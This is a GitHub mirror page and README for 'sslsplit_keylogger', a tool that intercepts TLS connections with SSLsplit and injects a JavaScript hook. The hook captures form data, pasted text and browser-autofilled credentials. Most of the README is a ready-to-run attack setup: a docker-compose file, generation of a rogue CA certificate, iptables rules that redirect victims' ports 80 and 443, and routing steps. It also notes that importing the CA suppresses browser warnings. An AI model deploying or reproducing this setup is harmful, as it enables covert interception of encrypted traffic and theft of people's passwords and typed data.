https://github.com/nesfit/sslsplit_keylogger

https://github.com/nesfit/sslsplit_keylogger

Last synced: 15 days ago
JSON representation

• Host: GitHub
• URL: https://github.com/nesfit/sslsplit_keylogger
• Owner: nesfit
• Created: 2019-03-10T10:34:21.000Z (over 5 years ago)
• Default Branch: master
• Last Pushed: 2019-12-03T04:09:02.000Z (almost 5 years ago)
• Last Synced: 2024-07-03T06:34:32.302Z (4 months ago)
• Language: Python
• Size: 59.6 KB
• Stars: 7
• Watchers: 6
• Forks: 2
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        
# Web Keylogger

Injection of hidden form and extraction of user's credentials if stored in the browser.

## SSLSplit

[SSLsplit][1] is a tool for man-in-the-middle attacks against SSL/TLS encrypted

network connections.

![Schema](docs/sslSplit.svg)

## Keylogger

* Web-service logging data from the Hook and visualizing them

### JS Hook

* Intercepts:

  * data submitted to forms,

  * pasted text into webpage,

  * extracts user's credential by fakeing login form --- if credentials are stored for the domain, browser (Chrome, Firefox) injects them into hidden form

## docker-compose.yml

```

version: '3.5'

services: 

  sslsplit:

    image: nesatfit/sslsplit:latest

    build:

      dockerfile: ./docker/sslsplit/Dockerfile

      context: ./sslsplit

    container_name: keylogger_sslsplit

    environment:

      - HOOK_HOST=$HOOK_HOST

      - HOOK_PORT_HTTP=$HOOK_PORT_HTTP

      - HOOK_PORT_HTTPS=$HOOK_PORT_HTTPS

    command:

      -k key/ca.key  

      -c key/ca.crt 

      -D 

      -K key/ca.key

      -P

      -l log/connections.log 

      -S log 

      -H "" 

      -H "" 

      https 0.0.0.0 8443 

      http 0.0.0.0 8080

    network_mode: "host"

    volumes:

      - ./data:/data

    working_dir: /data

    restart: unless-stopped

  keylogger:

    image: nesatfit/keylogger:latest

    build:

      context: ./keyloggerServer

    container_name: keylogger

    command: --db=mongo --hook_host=$HOOK_HOST --hook_port_http $HOOK_PORT_HTTP --hook_port_https $HOOK_PORT_HTTPS 

    ports:

      - 8081:80

      - 8445:443  

      - 7000:7000

    restart: unless-stopped

  mongo:

    container_name: keylogger_mongo 

    image: mongo

    restart: unless-stopped

```

## Server Setup

```bash

$ mkdir -p data/{key,log}

$ vim docker-compose.yml # modify env variables to reflect your environment

$ openssl req -x509 -newkey rsa:2048 -nodes -keyout data/key/ca.key -out data/key/ca.crt -days 3650 -subj '/CN=EasyPi'

$ docker-compose up -d

```

```bash

# setup

sysctl -w net.ipv4.ip_forward=1

iptables -P FORWARD ACCEPT

iptables -t nat -N SSLSPLIT

iptables -t nat -A SSLSPLIT -p tcp --dport 80 -j REDIRECT --to-ports 8080

iptables -t nat -A SSLSPLIT -p tcp --dport 443 -j REDIRECT --to-ports 8443

# enable

iptables -t nat -A PREROUTING -j SSLSPLIT

# disable

iptables -t nat -D PREROUTING -j SSLSPLIT

```

## Client Setup

```bash

# ip route del to default via XXX.XXX.XXX.XXX

# ip route add default via YYY.YYY.YYY.YY

curl -k https://www.messenger.com

```

> ProTip: No warning dialog after importing `ca.crt` into system/browser.

## Demonstration

- https://www.youtube.com/watch?v=kO2t3eZgG-8

## Read more

- 

[1]: